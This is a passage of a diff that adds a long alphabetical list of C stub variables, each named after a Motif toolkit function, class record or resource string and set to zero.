+int _XmReCacheLabG = 0;
+int _XmReCacheLabG_r = 0;
+int _XmRecordEvent = 0;
+int _XmRedisplayGadgets = 0;
+int _XmRedisplayHBar = 0;
+int _XmRedisplayLabG = 0;
+int _XmRedisplayVBar = 0;
+int _XmRegionClear = 0;
+int _XmRegionComputeExtents = 0;
+int _XmRegionCreate = 0;
+int _XmRegionCreateSize = 0;
+int _XmRegionDestroy = 0;
+int _XmRegionDrawShadow = 0;
+int _XmRegionEqual = 0;
+int _XmRegionFromImage = 0;
+int _XmRegionGetExtents = 0;
+int _XmRegionGetNumRectangles = 0;
+int _XmRegionGetRectangles = 0;
+int _XmRegionIntersect = 0;
+int _XmRegionIntersectRectWithRegion = 0;
+int _XmRegionIsEmpty = 0;
+int _XmRegionOffset = 0;
+int _XmRegionPointInRegion = 0;
+int _XmRegionSetGCRegion = 0;
+int _XmRegionShrink = 0;
+int _XmRegionSubtract = 0;
+int _XmRegionUnion = 0;
+int _XmRegionUnionRectWithRegion = 0;
+int _XmRegisterConverters = 0;
+int XmRegisterConverters = 0;
+int _XmRegisterPixmapConverters = 0;
+int XmRegisterSegmentEncoding = 0;
+int _XmRemoveAllCallbacks = 0;
+int _XmRemoveCallback = 0;
+int XmRemoveFromPostFromList = 0;
+int _XmRemoveGrab = 0;
+int _XmRemoveHashEntry = 0;
+int _XmRemoveHashIterator = 0;
+int XmRemoveProtocolCallback = 0;
+int XmRemoveProtocols = 0;
+int XmRemoveTabGroup = 0;
+int _Xm_RemQueue = 0;
+int _XmRenderCacheGet = 0;
+int _XmRenderCacheSet = 0;
+int XmRenderTableAddRenditions = 0;
+int XmRenderTableCopy = 0;
+int XmRenderTableCvtFromProp = 0;
+int XmRenderTableCvtToProp = 0;
+int _XmRenderTableDisplay = 0;
+int _XmRenderTableFindFallback = 0;
+int _XmRenderTableFindFirstFont = 0;
+int _XmRenderTableFindRendition = 0;
+int XmRenderTableFree = 0;
+int XmRenderTableGetDefaultFontExtents = 0;
+int XmRenderTableGetRendition = 0;
+int XmRenderTableGetRenditions = 0;
+int XmRenderTableGetTags = 0;
+int _XmRenderTableRemoveRenditions = 0;
+int XmRenderTableRemoveRenditions = 0;
+int _XmRenditionCopy = 0;
+int _XmRenditionCreate = 0;
+int XmRenditionCreate = 0;
+int XmRenditionFree = 0;
+int _XmRenditionMerge = 0;
+int XmRenditionRetrieve = 0;
+int XmRenditionUpdate = 0;
+int _XmReOrderResourceList = 0;
+int XmRepTypeAddReverse = 0;
+int XmRepTypeGetId = 0;
+int XmRepTypeGetNameList = 0;
+int XmRepTypeGetRecord = 0;
+int XmRepTypeGetRegistered = 0;
+int _XmRepTypeInstallConverters = 0;
+int XmRepTypeInstallTearOffModelConverter = 0;
+int XmRepTypeRegister = 0;
+int XmRepTypeValidValue = 0;
+int _XmRequestNewSize = 0;
+int _XmResetTravGraph = 0;
+int _XmResizeHashTable = 0;
+int _XmResizeObject = 0;
+int _XmResizeWidget = 0;
+int XmResolveAllPartOffsets = 0;
+int XmResolveAllPartOffsets64 = 0;
+int XmResolvePartOffsets = 0;
+int _XmRestoreCoreClassTranslations = 0;
+int _XmRestoreExcludedTearOffToToplevelShell = 0;
+int _XmRestoreTearOffToMenuShell = 0;
+int _XmRestoreTearOffToToplevelShell = 0;
+int _XmRootGeometryManager = 0;
+int _XmRowColumn_bar_table = 0;
+int xmRowColumnClassRec = 0;
+int _XmRowColumn_menu_table = 0;
+int _XmRowColumn_menu_traversal_table = 0;
+int _XmRowColumn_option_table = 0;
+int xmRowColumnWidgetClass = 0;
+int _XmSaccelerator = 0;
+int _XmSacceleratorText = 0;
+int _XmSactivateCallback = 0;
+int _XmSadjustLast = 0;
+int _XmSadjustMargin = 0;
+int _XmSalignment = 0;
+int _XmSallowOverlap = 0;
+int _XmSallowResize = 0;
+int _XmSanimationMask = 0;
+int _XmSanimationPixmap = 0;
+int _XmSanimationPixmapDepth = 0;
+int _XmSanimationStyle = 0;
+int _XmSapplyCallback = 0;
+int _XmSapplyLabelString = 0;
+int _XmSarmCallback = 0;
+int _XmSarmColor = 0;
+int _XmSarmPixmap = 0;
+int _XmSarrowDirection = 0;
+int xmSashClassRec = 0;
+int _XmSash_defTranslations = 0;
+int xmSashWidgetClass = 0;
+int _XmSattachment = 0;
+int _XmSaudibleWarning = 0;
+int _XmSautomaticSelection = 0;
+int _XmSautoShowCursorPosition = 0;
+int _XmSautoUnmanage = 0;
+int _XmSavailability = 0;
+int _XmSaveCoreClassTranslations = 0;
+int _XmSaveMenuProcContext = 0;
+int _XmSblendModel = 0;
+int _XmSblinkRate = 0;
+int _XmSbottomAttachment = 0;
+int _XmSbottomOffset = 0;
+int _XmSbottomPosition = 0;
+int _XmSbottomShadowColor = 0;
+int _XmSbottomShadowPixmap = 0;
+int _XmSbottomWidget = 0;
+int _XmSbrowseSelectionCallback = 0;
+int _XmSbuttonAccelerators = 0;
+int _XmSbuttonAcceleratorText = 0;
+int _XmSbuttonCount = 0;
+int _XmSbuttonFontList = 0;
+int _XmSbuttonMnemonicCharSets = 0;
+int _XmSbuttonMnemonics = 0;
+int _XmSbuttons = 0;
+int _XmSbuttonSet = 0;
+int _XmSbuttonType = 0;
+int _XmSCAccelerator = 0;
+int _XmSCAcceleratorText = 0;
+int _XmSCAdjustLast = 0;
+int _XmSCAdjustMargin = 0;
+int xmScaleClassRec = 0;
+int _XmScaleGetTitleString = 0;
+int XmScaleGetValue = 0;
+int XmScaleSetTicks = 0;
+int XmScaleSetValue = 0;
+int xmScaleWidgetClass = 0;
+int _XmSCAlignment = 0;
+int _XmSCAllowOverlap = 0;
+int _XmScancelButton = 0;
+int _XmScancelCallback = 0;
+int _XmScancelLabelString = 0;
+int _XmSCAnimationMask = 0;
+int _XmSCAnimationPixmap = 0;
+int _XmSCAnimationPixmapDepth = 0;
+int _XmSCAnimationStyle = 0;
+int _XmScanningCacheGet = 0;
+int _XmScanningCacheSet = 0;
+int _XmSCApplyLabelString = 0;
+int _XmSCArmCallback = 0;
+int _XmSCArmColor = 0;
+int _XmSCArmPixmap = 0;
+int _XmSCArrowDirection = 0;
+int _XmScascadeButton = 0;
+int _XmScascadePixmap = 0;
+int _XmScascadingCallback = 0;
+int _XmSCAtomList = 0;
+int _XmSCAttachment = 0;
+int _XmSCAudibleWarning = 0;
+int _XmSCAutomaticSelection = 0;
+int _XmSCAutoShowCursorPosition = 0;
+int _XmSCAutoUnmanage = 0;
+int _XmSCAvailability = 0;
+int _XmSCBackgroundPixmap = 0;
+int _XmSCBlendModel = 0;
+int _XmSCBlinkRate = 0;
+int _XmSCBooleanDimension = 0;
+int _XmSCBottomShadowColor = 0;
+int _XmSCBottomShadowPixmap = 0;
+int _XmSCButtonAccelerators = 0;
+int _XmSCButtonAcceleratorText = 0;
+int _XmSCButtonCount = 0;
+int _XmSCButtonFontList = 0;
+int _XmSCButtonMnemonicCharSets = 0;
+int _XmSCButtonMnemonics = 0;
+int _XmSCButtons = 0;
+int _XmSCButtonSet = 0;
+int _XmSCButtonType = 0;
+int _XmSCCallbackProc = 0;
+int _XmSCCancelLabelString = 0;
+int _XmSCChar = 0;
+int _XmSCCharSetTable = 0;
+int _XmSCChildHorizontalAlignment = 0;
+int _XmSCChildHorizontalSpacing = 0;
+int _XmSCChildPlacement = 0;
+int _XmSCChildren = 0;
+int _XmSCChildType = 0;
+int _XmSCChildVerticalAlignment = 0;
+int _XmSCClientData = 0;
+int _XmSCClipWindow = 0;
+int _XmSCColumns = 0;
+int _XmSCCommandWindow = 0;
+int _XmSCCommandWindowLocation = 0;
+int _XmSCCompoundText = 0;
+int _XmSCConvertProc = 0;
+int _XmSCCursorBackground = 0;
+int _XmSCCursorForeground = 0;
+int _XmSCCursorPosition = 0;
+int _XmSCCursorPositionVisible = 0;
+int _XmSCDarkThreshold = 0;
+int _XmSCDecimalPoints = 0;
+int _XmSCDefaultButtonShadowThickness = 0;
+int _XmSCDefaultButtonType = 0;
+int _XmSCDefaultCopyCursorIcon = 0;
+int _XmSCDefaultFontList = 0;
+int _XmSCDefaultInvalidCursorIcon = 0;
+int _XmSCDefaultLinkCursorIcon = 0;
+int _XmSCDefaultMoveCursorIcon = 0;
+int _XmSCDefaultNoneCursorIcon = 0;
+int _XmSCDefaultPosition = 0;
+int _XmSCDefaultSourceCursorIcon = 0;
+int _XmSCDefaultValidCursorIcon = 0;
+int _XmSCDeleteResponse = 0;
+int _XmSCDesktopParent = 0;
+int _XmSCDialogStyle = 0;
+int _XmSCDialogTitle = 0;
+int _XmSCDialogType = 0;
+int _XmSCDirectory = 0;
+int _XmSCDirectoryValid = 0;
+int _XmSCDirListItemCount = 0;
+int _XmSCDirListItems = 0;
+int _XmSCDirListLabelString = 0;
+int _XmSCDirMask = 0;
+int _XmSCDirSearchProc = 0;
+int _XmSCDirSpec = 0;
+int _XmSCDisarmCallback = 0;
+int _XmSCDoubleClickInterval = 0;
+int _XmSCDragContextClass = 0;
+int _XmSCDragDropFinishCallback = 0;
+int _XmSCDragIconClass = 0;
+int _XmSCDragInitiatorProtocolStyle = 0;
+int _XmSCDragMotionCallback = 0;
+int _XmSCDragOperations = 0;
+int _XmSCDragOverMode = 0;
+int _XmSCDragProc = 0;
+int _XmSCDragReceiverProtocolStyle = 0;
+int _XmSCDropProc = 0;
+int _XmSCDropRectangles = 0;
+int _XmSCDropSiteActivity = 0;
+int _XmSCDropSiteEnterCallback = 0;
+int _XmSCDropSiteLeaveCallback = 0;
+int _XmSCDropSiteManagerClass = 0;
+int _XmSCDropSiteOperations = 0;
+int _XmSCDropSiteType = 0;
+int _XmSCDropStartCallback = 0;
+int _XmSCDropTransferClass = 0;
+int _XmSCDropTransfers = 0;
+int _XmSCEditable = 0;
+int _XmSCEntryBorder = 0;
+int _XmSCEntryClass = 0;
+int _XmSCExportTargets = 0;
+int _XmSCExposeCallback = 0;
+int _XmSCExtensionType = 0;
+int _XmSCFileListItemCount = 0;
+int _XmSCFileListItems = 0;
+int _XmSCFileListLabelString = 0;
+int _XmSCFileSearchProc = 0;
+int _XmSCFileTypeMask = 0;
+int _XmSCFillOnArm = 0;
+int _XmSCFillOnSelect = 0;
+int _XmSCFilterLabelString = 0;
+int _XmSCFontList = 0;
+int _XmSCFONTLIST_DEFAULT_TAG_STRING = 0;
+int _XmSCForegroundThreshold = 0;
+int _XmSCGadgetPixmap = 0;
+int _XmScheckButton = 0;
+int _XmSCHelpLabelString = 0;
+int _XmSCHighlightColor = 0;
+int _XmSCHighlightOnEnter = 0;
+int _XmSCHighlightPixmap = 0;
+int _XmSCHighlightThickness = 0;
+int _XmSchildHorizontalAlignment = 0;
+int _XmSchildHorizontalSpacing = 0;
+int _XmSchildPlacement = 0;
+int _XmSchildPosition = 0;
+int _XmSchildType = 0;
+int _XmSchildVerticalAlignment = 0;
+int _XmSCHorizontalDimension = 0;
+int _XmSCHorizontalFontUnit = 0;
+int _XmSCHorizontalInt = 0;
+int _XmSCHorizontalPosition = 0;
+int _XmSCHorizontalScrollBar = 0;
+int _XmSCHot = 0;
+int _XmSCICCHandle = 0;
+int _XmSCIconAttachment = 0;
+int _XmSCImportTargets = 0;
+int _XmSCIncrement = 0;
+int _XmSCIncremental = 0;
+int _XmSCIndicatorOn = 0;
+int _XmSCIndicatorSize = 0;
+int _XmSCIndicatorType = 0;
+int _XmSCInitialDelay = 0;
+int _XmSCInitialFocus = 0;
+int _XmSCInputCreate = 0;
+int _XmSCInputMethod = 0;
+int _XmSCInvalidCursorForeground = 0;
+int _XmSCIsAligned = 0;
+int _XmSCIsHomogeneous = 0;
+int _XmSCISO8859_DASH_1 = 0;
+int _XmSCItemCount = 0;
+int _XmSCItems = 0;
+int _XmSCKeyboardFocusPolicy = 0;
+int _XmSCKeySym = 0;
+int _XmSCKeySymTable = 0;
+int _XmSCLabelFontList = 0;
+int _XmSCLabelInsensitivePixmap = 0;
+int _XmSCLabelPixmap = 0;
+int _XmSCLabelString = 0;
+int _XmSCLabelType = 0;
+int _XmSclientData = 0;
+int _XmSCLightThreshold = 0;
+int _XmSclipWindow = 0;
+int _XmSCListLabelString = 0;
+int _XmSCListMarginHeight = 0;
+int _XmSCListMarginWidth = 0;
+int _XmSCListSizePolicy = 0;
+int _XmSCListSpacing = 0;
+int _XmSCListUpdated = 0;
+int _XmSCLogicalParent = 0;
+int _XmSCMainWindowMarginHeight = 0;
+int _XmSCMainWindowMarginWidth = 0;
+int _XmSCManBottomShadowPixmap = 0;
+int _XmSCManForegroundPixmap = 0;
+int _XmSCManHighlightPixmap = 0;
+int _XmSCManTopShadowPixmap = 0;
+int _XmSCMappingDelay = 0;
+int _XmSCMarginBottom = 0;
+int _XmSCMarginHeight = 0;
+int _XmSCMarginLeft = 0;
+int _XmSCMarginRight = 0;
+int _XmSCMarginTop = 0;
+int _XmSCMarginWidth = 0;
+int _XmSCMask = 0;
+int _XmSCMaximum = 0;
+int _XmSCMaxItems = 0;
+int _XmSCMaxLength = 0;
+int _XmSCMaxValue = 0;
+int _XmSCMenuBar = 0;
+int _XmSCMenuPost = 0;
+int _XmSCMenuWidget = 0;
+int _XmSCMessageProc = 0;
+int _XmSCMessageWindow = 0;
+int _XmSCMinimizeButtons = 0;
+int _XmSCMinimum = 0;
+int _XmSCMnemonic = 0;
+int _XmSCMnemonicCharSet = 0;
+int _XmSCMoveOpaque = 0;
+int _XmSCMultiClick = 0;
+int _XmSCMustMatch = 0;
+int _XmSCMwmDecorations = 0;
+int _XmSCMwmFunctions = 0;
+int _XmSCMwmInputMode = 0;
+int _XmSCMwmMenu = 0;
+int _XmSCMwmMessages = 0;
+int _XmSCNavigationType = 0;
+int _XmSCNeedsMotion = 0;
+int _XmSCNoMatchString = 0;
+int _XmSCNoneCursorForeground = 0;
+int _XmSCNoResize = 0;
+int _XmSCNotifyProc = 0;
+int _XmSCNumChildren = 0;
+int _XmSCNumColumns = 0;
+int _XmSCNumDropRectangles = 0;
+int _XmSCNumDropTransfers = 0;
+int _XmSCNumExportTargets = 0;
+int _XmSCNumImportTargets = 0;
+int _XmSCOffset = 0;
+int _XmSCOkLabelString = 0;
+int _XmScolumns = 0;
+int _XmScommand = 0;
+int _XmScommandChangedCallback = 0;
+int _XmScommandEnteredCallback = 0;
+int _XmScommandWindow = 0;
+int _XmScommandWindowLocation = 0;
+int _XmSconvertProc = 0;
+int _XmSCOperationChangedCallback = 0;
+int _XmSCOperationCursorIcon = 0;
+int _XmSCOptionLabel = 0;
+int _XmSCOptionMnemonic = 0;
+int _XmSCOutputCreate = 0;
+int _XmSCPacking = 0;
+int _XmSCPageIncrement = 0;
+int _XmSCPaneMaximum = 0;
+int _XmSCPaneMinimum = 0;
+int _XmSCPattern = 0;
+int _XmSCPendingDelete = 0;
+int _XmSCPopupEnabled = 0;
+int _XmSCPositionIndex = 0;
+int _XmSCPostFromButton = 0;
+int _XmSCPostFromCount = 0;
+int _XmSCPostFromList = 0;
+int _XmSCPreeditType = 0;
+int _XmSCPrimForegroundPixmap = 0;
+int _XmSCProc = 0;
+int _XmSCProcessingDirection = 0;
+int _XmSCPromptString = 0;
+int _XmSCProtocolCallback = 0;
+int _XmSCPushButtonEnabled = 0;
+int _XmSCQualifySearchDataProc = 0;
+int _XmSCRadioAlwaysOne = 0;
+int _XmSCRadioBehavior = 0;
+int _XmSCRecomputeSize = 0;
+int _XmSCRectangleList = 0;
+int _XmSCRectangles = 0;
+int xmScreenClass = 0;
+int xmScreenClassRec = 0;
+int _XmScreenGetOperationIcon = 0;
+int _XmScreenGetSourceIcon = 0;
+int _XmScreenGetStateIcon = 0;
+int xmScreenObjectClass = 0;
+int _XmScreenRemoveFromCursorCache = 0;
+int _XmSCRepeatDelay = 0;
+int _XmSCResizeCallback = 0;
+int _XmSCResizeHeight = 0;
+int _XmSCResizePolicy = 0;
+int _XmSCResizeWidth = 0;
+int xmScrollBarClassRec = 0;
+int _XmScrollBar_defaultTranslations = 0;
+int XmScrollBarGetValues = 0;
+int XmScrollBarSetValues = 0;
+int xmScrollBarWidgetClass = 0;
+int xmScrolledWindowClassRec = 0;
+int XmScrolledWindowSetAreas = 0;
+int xmScrolledWindowWidgetClass = 0;
+int _XmScrolledW_ScrolledWindowXlations = 0;
+int XmScrollVisible = 0;
+int _XmSCRowColumnType = 0;
+int _XmSCRows = 0;
+int _XmSCRubberPositioning = 0;
+int _XmSCSashHeight = 0;
+int _XmSCSashIndent = 0;
+int _XmSCSashWidth = 0;
+int _XmSCScaleHeight = 0;
+int _XmSCScaleMultiple = 0;
+int _XmSCScaleWidth = 0;
+int _XmSCScroll = 0;
+int _XmSCScrollBarDisplayPolicy = 0;
+int _XmSCScrollBarPlacement = 0;
+int _XmSCScrolledWindowMarginHeight = 0;
+int _XmSCScrolledWindowMarginWidth = 0;
+int _XmSCScrollingPolicy = 0;
+int _XmSCScrollSide = 0;
+int _XmSCSelectColor = 0;
+int _XmSCSelectedItemCount = 0;
+int _XmSCSelectedItems = 0;
+int _XmSCSelectInsensitivePixmap = 0;
+int _XmSCSelectionArrayCount = 0;
+int _XmSCSelectionLabelString = 0;
+int _XmSCSelectionPolicy = 0;
+int _XmSCSelectionType = 0;
+int _XmSCSelectPixmap = 0;
+int _XmSCSelectThreshold = 0;
+int _XmSCSeparatorOn = 0;
+int _XmSCSeparatorType = 0;
+int _XmSCSet = 0;
+int _XmSCShadowThickness = 0;
+int _XmSCShadowType = 0;
+int _XmSCShellHorizDim = 0;
+int _XmSCShellHorizPos = 0;
+int _XmSCShellUnitType = 0;
+int _XmSCShellVertDim = 0;
+int _XmSCShellVertPos = 0;
+int _XmSCShowArrows = 0;
+int _XmSCShowAsDefault = 0;
+int _XmSCShowSeparator = 0;
+int _XmSCShowValue = 0;
+int _XmSCSimpleCheckBox = 0;
+int _XmSCSimpleMenuBar = 0;
+int _XmSCSimpleOptionMenu = 0;
+int _XmSCSimplePopupMenu = 0;
+int _XmSCSimplePulldownMenu = 0;
+int _XmSCSimpleRadioBox = 0;
+int _XmSCSizePolicy = 0;
+int _XmSCSliderSize = 0;
+int _XmSCSource = 0;
+int _XmSCSourceCursorIcon = 0;
+int _XmSCSourceIsExternal = 0;
+int _XmSCSourcePixmapIcon = 0;
+int _XmSCSourceWidget = 0;
+int _XmSCSourceWindow = 0;
+int _XmSCSpacing = 0;
+int _XmSCStartTime = 0;
+int _XmSCStateCursorIcon = 0;
+int _XmSCStringDirection = 0;
+int _XmSCTearOffModel = 0;
+int _XmSCTextFontList = 0;
+int _XmSCTextString = 0;
+int _XmSCTextValue = 0;
+int _XmSCTitleString = 0;
+int _XmSCTopCharacter = 0;
+int _XmSCTopItemPosition = 0;
+int _XmSCTopLevelEnterCallback = 0;
+int _XmSCTopLevelLeaveCallback = 0;
+int _XmSCTopShadowColor = 0;
+int _XmSCTopShadowPixmap = 0;
+int _XmSCTransferProc = 0;
+int _XmSCTransferStatus = 0;
+int _XmSCTraversalOn = 0;
+int _XmSCTraversalType = 0;
+int _XmSCTreeUpdateProc = 0;
+int _XmSCTroughColor = 0;
+int _XmSCUnitType = 0;
+int _XmSCUnpostBehavior = 0;
+int _XmSCUnselectPixmap = 0;
+int _XmSCUpdateSliderSize = 0;
+int _XmScursorBackground = 0;
+int _XmScursorForeground = 0;
+int _XmScursorPosition = 0;
+int _XmScursorPositionVisible = 0;
+int _XmSCUseAsyncGeometry = 0;
+int _XmSCUserData = 0;
+int _XmSCValidCursorForeground = 0;
+int _XmSCValueChangedCallback = 0;
+int _XmSCValueWcs = 0;
+int _XmSCVerifyBell = 0;
+int _XmSCVerticalAlignment = 0;
+int _XmSCVerticalDimension = 0;
+int _XmSCVerticalFontUnit = 0;
+int _XmSCVerticalInt = 0;
+int _XmSCVerticalPosition = 0;
+int _XmSCVerticalScrollBar = 0;
+int _XmSCVirtualBinding = 0;
+int _XmSCVisibleItemCount = 0;
+int _XmSCVisibleWhenOff = 0;
+int _XmSCVisualPolicy = 0;
+int _XmSCWhichButton = 0;
+int _XmSCWordWrap = 0;
+int _XmSCWorkWindow = 0;
+int _XmSCXmBackgroundPixmap = 0;
+int _XmSCXmFONTLIST_DEFAULT_TAG_STRING = 0;
+int _XmSCXmString = 0;
+int _XmSCXmStringCharSet = 0;
+int _XmSCXmStringTable = 0;
+int _XmSdarkThreshold = 0;
+int _XmSdecimalPoints = 0;
+int _XmSdecrementCallback = 0;
+int _XmSdefaultActionCallback = 0;
+int _XmSDEFAULT_BACKGROUND = 0;
+int _XmSdefaultButton = 0;
+int _XmSdefaultButtonShadowThickness = 0;
+int _XmSdefaultButtonType = 0;
+int _XmSdefaultCopyCursorIcon = 0;
+int _XmSDEFAULT_FONT = 0;
+int _XmSdefaultFontList = 0;
+int _XmSdefaultInvalidCursorIcon = 0;
+int _XmSdefaultLinkCursorIcon = 0;
+int _XmSdefaultMoveCursorIcon = 0;
+int _XmSdefaultNoneCursorIcon = 0;
+int _XmSdefaultPosition = 0;
+int _XmSdefaultSourceCursorIcon = 0;
+int _XmSdefaultValidCursorIcon = 0;
+int _XmSdeleteResponse = 0;
+int _XmSdesktopParent = 0;
+int _XmSdialogStyle = 0;
+int _XmSdialogTitle = 0;
+int _XmSdialogType = 0;
+int _XmSdirectory = 0;
+int _XmSdirectoryValid = 0;
+int _XmSdirListItemCount = 0;
+int _XmSdirListItems = 0;
+int _XmSdirListLabelString = 0;
+int _XmSdirMask = 0;
+int _XmSdirSearchProc = 0;
+int _XmSdirSpec = 0;
+int _XmSdisarmCallback = 0;
+int _XmSdoubleClickInterval = 0;
+int _XmSdoubleSeparator = 0;
+int _XmSdragCallback = 0;
+int _XmSdragContextClass = 0;
+int _XmSdragDropFinishCallback = 0;
+int _XmSdragIconClass = 0;
+int _XmSdragInitiatorProtocolStyle = 0;
+int _XmSdragMotionCallback = 0;
+int _XmSdragOperations = 0;
+int _XmSdragOverMode = 0;
+int _XmSdragProc = 0;
+int _XmSdragReceiverProtocolStyle = 0;
+int _XmSdropFinishCallback = 0;
+int _XmSdropProc = 0;
+int _XmSdropRectangles = 0;
+int _XmSdropSiteActivity = 0;
+int _XmSdropSiteEnterCallback = 0;
+int _XmSdropSiteLeaveCallback = 0;
+int _XmSdropSiteManagerClass = 0;
+int _XmSdropSiteOperations = 0;
+int _XmSdropSiteType = 0;
+int _XmSdropStartCallback = 0;
+int _XmSdropTransferClass = 0;
+int _XmSdropTransfers = 0;
+int _XmSearchColorCache = 0;
+int _XmSecondaryResourceData = 0;
+int _XmSeditable = 0;
+int _XmSeditMode = 0;
+int _XmSelectColorDefault = 0;
+int _XmSelectioB_defaultTextAccelerators = 0;
+int xmSelectionBoxClassRec = 0;
+int _XmSelectionBoxCreateApplyButton = 0;
+int _XmSelectionBoxCreateCancelButton = 0;
+int _XmSelectionBoxCreateHelpButton = 0;
+int _XmSelectionBoxCreateList = 0;
+int _XmSelectionBoxCreateListLabel = 0;
+int _XmSelectionBoxCreateOkButton = 0;
+int _XmSelectionBoxCreateSelectionLabel = 0;
+int _XmSelectionBoxCreateSeparator = 0;
+int _XmSelectionBoxCreateText = 0;
+int _XmSelectionBoxGeoMatrixCreate = 0;
+int _XmSelectionBoxGetApplyLabelString = 0;
+int _XmSelectionBoxGetCancelLabelString = 0;
+int XmSelectionBoxGetChild = 0;
+int _XmSelectionBoxGetHelpLabelString = 0;
+int _XmSelectionBoxGetListItemCount = 0;
+int _XmSelectionBoxGetListItems = 0;
+int _XmSelectionBoxGetListLabelString = 0;
+int _XmSelectionBoxGetListVisibleItemCount = 0;
+int _XmSelectionBoxGetOkLabelString = 0;
+int _XmSelectionBoxGetSelectionLabelString = 0;
+int _XmSelectionBoxGetTextColumns = 0;
+int _XmSelectionBoxGetTextString = 0;
+int _XmSelectionBoxNoGeoRequest = 0;
+int _XmSelectionBoxRestore = 0;
+int _XmSelectionBoxUpOrDown = 0;
+int xmSelectionBoxWidgetClass = 0;
+int _XmSEMPTY_STRING = 0;
+int _XmSendICCCallback = 0;
+int _XmSentryAlignment = 0;
+int _XmSentryBorder = 0;
+int _XmSentryCallback = 0;
+int _XmSentryClass = 0;
+int _XmSentryVerticalAlignment = 0;
+int _XmSeparatorCacheCompare = 0;
+int xmSeparatorClassRec = 0;
+int _XmSeparatorFix = 0;
+int xmSeparatorGadgetClass = 0;
+int xmSeparatorGadgetClassRec = 0;
+int xmSeparatorGCacheObjClassRec = 0;
+int xmSeparatorWidgetClass = 0;
+int _XmSetActiveTabGroup = 0;
+int _XmSetActualClass = 0;
+int XmSetColorCalculation = 0;
+int _XmSetDefaultBackgroundColorSpec = 0;
+int _XmSetDestination = 0;
+int _XmSetDragReceiverInfo = 0;
+int _XmSetEtchedSlider = 0;
+int _XmSetFocusFlag = 0;
+int _XmSetFocusResetFlag = 0;
+int XmSetFontUnit = 0;
+int XmSetFontUnits = 0;
+int _XmSetInDragMode = 0;
+int _XmSetInitialOfTabGraph = 0;
+int _XmSetInitialOfTabGroup = 0;
+int _XmSetKidGeo = 0;
+int _XmSetLastManagedMenuTime = 0;
+int XmSetMenuCursor = 0;
+int _XmSetMenuTraversal = 0;
+int _XmSetPopupMenuClick = 0;
+int XmSetProtocolHooks = 0;
+int _XmSetRect = 0;
+int _XmSetSwallowEventHandler = 0;
+int _XmSetThickness = 0;
+int _XmSetThicknessDefault0 = 0;
+int XmSetToolTipString = 0;
+int _XmSetTransientFlag = 0;
+int _XmSetValuesOnChildren = 0;
+int _XmSetXmDisplayClass = 0;
+int _XmSexportTargets = 0;
+int _XmSexposeCallback = 0;
+int _XmSextendedSelectionCallback = 0;
+int _XmSextensionType = 0;
+int _XmSFAddNavigator = 0;
+int _XmSfileListItemCount = 0;
+int _XmSfileListItems = 0;
+int _XmSfileListLabelString = 0;
+int _XmSfileSearchProc = 0;
+int _XmSfileTypeMask = 0;
+int _XmSfillOnArm = 0;
+int _XmSfillOnSelect = 0;
+int _XmSfilterLabelString = 0;
+int _XmSfocusCallback = 0;
+int _XmSfocusMovedCallback = 0;
+int _XmSfocusPolicyChanged = 0;
+int _XmSfontList = 0;
+int _XmSforegroundThreshold = 0;
+int _XmSfractionBase = 0;
+int _XmSFRemoveNavigator = 0;
+int _XmSFUpdateNavigatorsValue = 0;
+int _XmSgainPrimaryCallback = 0;
+int xmShellExtClassRec = 0;
+int xmShellExtObjectClass = 0;
+int _XmShellIsExclusive = 0;
+int _XmShelpCallback = 0;
+int _XmShelpLabelString = 0;
+int _XmShighlightColor = 0;
+int _XmShighlightOnEnter = 0;
+int _XmShighlightPixmap = 0;
+int _XmShighlightThickness = 0;
+int _XmShistoryItemCount = 0;
+int _XmShistoryItems = 0;
+int _XmShistoryMaxItems = 0;
+int _XmShistoryVisibleItemCount = 0;
+int _XmShorizontalFontUnit = 0;
+int _XmShorizontalScrollBar = 0;
+int _XmShorizontalSpacing = 0;
+int _XmShotX = 0;
+int _XmShotY = 0;
+int _XmSiccHandle = 0;
+int XmSimpleSpinBoxAddItem = 0;
+int xmSimpleSpinBoxClassRec = 0;
+int XmSimpleSpinBoxDeletePos = 0;
+int XmSimpleSpinBoxSetItem = 0;
+int xmSimpleSpinBoxWidgetClass = 0;
+int _XmSimportTargets = 0;
+int _XmSincrement = 0;
+int _XmSincremental = 0;
+int _XmSincrementCallback = 0;
+int _XmSindicatorOn = 0;
+int _XmSindicatorSize = 0;
+int _XmSindicatorType = 0;
+int _XmSinitialDelay = 0;
+int _XmSinitialFocus = 0;
+int _XmSinputCallback = 0;
+int _XmSinputCreate = 0;
+int _XmSinputMethod = 0;
+int _XmSinvalidCursorForeground = 0;
+int _XmSisAligned = 0;
+int _XmSisHomogeneous = 0;
+int _XmSitemCount = 0;
+int _XmSitems = 0;
+int _XmSkeyboardFocusPolicy = 0;
+int _XmSlabelFontList = 0;
+int _XmSlabelInsensitivePixmap = 0;
+int _XmSlabelPixmap = 0;
+int _XmSlabelString = 0;
+int _XmSlabelType = 0;
+int _XmSleep = 0;
+int _XmSleftAttachment = 0;
+int _XmSleftOffset = 0;
+int _XmSleftPosition = 0;
+int _XmSleftWidget = 0;
+int xmSlideContextClassRec = 0;
+int xmSlideContextWidgetClass = 0;
+int _XmSlightThreshold = 0;
+int _XmSlistItemCount = 0;
+int _XmSlistItems = 0;
+int _XmSlistLabelString = 0;
+int _XmSlistMarginHeight = 0;
+int _XmSlistMarginWidth = 0;
+int _XmSlistSizePolicy = 0;
+int _XmSlistSpacing = 0;
+int _XmSlistUpdated = 0;
+int _XmSlistVisibleItemCount = 0;
+int _XmSlogicalParent = 0;
+int _XmSlosePrimaryCallback = 0;
+int _XmSlosingFocusCallback = 0;
+int _XmSmainWindowMarginHeight = 0;
+int _XmSmainWindowMarginWidth = 0;
+int _XmSmapCallback = 0;
+int _XmSmappingDelay = 0;
+int _XmSmargin = 0;
+int _XmSmarginBottom = 0;
+int _XmSmarginHeight = 0;
+int _XmSmarginLeft = 0;
+int _XmSmarginRight = 0;
+int _XmSmarginTop = 0;
+int _XmSmarginWidth = 0;
+int _XmSmask = 0;
+int _XmSmaximum = 0;
+int _XmSmaxLength = 0;
+int _XmSmenuAccelerator = 0;
+int _XmSmenuBar = 0;
+int _XmSmenuCursor = 0;
+int _XmSmenuHelpWidget = 0;
+int _XmSmenuHistory = 0;
+int _XmSmenuPost = 0;
+int _XmSmessageAlignment = 0;
+int _XmSmessageProc = 0;
+int _XmSmessageString = 0;
+int _XmSmessageWindow = 0;
+int _XmSminimizeButtons = 0;
+int _XmSminimum = 0;
+int _XmSmnemonic = 0;
+int _XmSmnemonicCharSet = 0;
+int _XmSmodifyVerifyCallback = 0;
+int _XmSmodifyVerifyCallbackWcs = 0;
+int _XmSmotionVerifyCallback = 0;
+int _XmSmoveOpaque = 0;
